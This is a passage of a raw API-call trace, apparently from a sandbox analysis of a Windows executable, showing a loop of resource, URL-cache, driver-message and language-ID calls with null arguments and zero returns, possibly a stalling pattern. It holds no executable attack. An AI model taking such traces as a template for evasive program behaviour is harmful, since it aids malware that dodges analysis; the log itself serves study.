wLanguage=0x409) returned 0x0 [0185.762] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.762] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.762] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.762] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.762] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.762] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.762] GetUserDefaultLangID () returned 0x409 [0185.762] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.762] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.762] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.762] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.762] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.762] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.762] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.762] GetUserDefaultLangID () returned 0x409 [0185.762] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.762] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.763] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.763] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.763] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.763] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.763] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.763] GetUserDefaultLangID () returned 0x409 [0185.763] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.763] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.763] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.763] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.763] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.763] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.763] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.763] GetUserDefaultLangID () returned 0x409 [0185.763] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.763] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.763] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.763] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.763] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.763] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.763] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.763] GetUserDefaultLangID () returned 0x409 [0185.763] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.763] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.763] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.763] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.763] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.763] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.763] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.763] GetUserDefaultLangID () returned 0x409 [0185.763] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.763] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.763] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.763] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.763] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.763] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.764] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.764] GetUserDefaultLangID () returned 0x409 [0185.764] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.764] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.764] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.764] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.764] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.764] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.764] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.764] GetUserDefaultLangID () returned 0x409 [0185.764] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.764] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.764] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.764] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.764] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.764] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.764] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.764] GetUserDefaultLangID () returned 0x409 [0185.764] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.764] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.764] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.764] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.764] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.764] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.764] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.764] GetUserDefaultLangID () returned 0x409 [0185.764] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.764] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.764] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.764] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.764] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.764] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.764] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.764] GetUserDefaultLangID () returned 0x409 [0185.764] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.764] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.765] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.765] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.765] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.765] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.765] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.765] GetUserDefaultLangID () returned 0x409 [0185.765] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.765] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.765] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.765] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.765] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.765] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.765] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.765] GetUserDefaultLangID () returned 0x409 [0185.765] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.765] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.765] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.765] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.765] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.765] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.765] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.765] GetUserDefaultLangID () returned 0x409 [0185.765] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.765] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.765] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.765] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.765] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.765] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.765] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.765] GetUserDefaultLangID () returned 0x409 [0185.765] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.765] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.765] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.765] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.765] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.765] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.765] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.765] GetUserDefaultLangID () returned 0x409 [0185.765] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.765] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.765] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.766] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.766] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.766] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.766] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.766] GetUserDefaultLangID () returned 0x409 [0185.766] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.766] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.766] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.766] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.766] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.766] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.766] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.766] GetUserDefaultLangID () returned 0x409 [0185.766] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.766] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.766] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.766] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.766] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.766] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.766] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.766] GetUserDefaultLangID () returned 0x409 [0185.766] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.766] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.766] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.766] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.766] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.766] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.766] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.766] GetUserDefaultLangID () returned 0x409 [0185.766] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.766] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.766] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.766] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.766] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.766] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.766] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.766] GetUserDefaultLangID () returned 0x409 [0185.766] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.766] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.766] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.766] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.767] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.767] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.767] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.767] GetUserDefaultLangID () returned 0x409 [0185.767] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.767] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.767] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.767] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.767] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.767] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.767] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.767] GetUserDefaultLangID () returned 0x409 [0185.767] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.767] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.767] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.767] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.767] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.767] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.767] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.767] GetUserDefaultLangID () returned 0x409 [0185.767] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.767] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.767] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.767] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.767] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.767] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.767] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.767] GetUserDefaultLangID () returned 0x409 [0185.767] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.768] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.768] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.768] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.768] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.768] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.768] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.768] GetUserDefaultLangID () returned 0x409 [0185.768] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.768] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.768] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.768] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.768] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.768] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.768] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.768] GetUserDefaultLangID () returned 0x409 [0185.768] 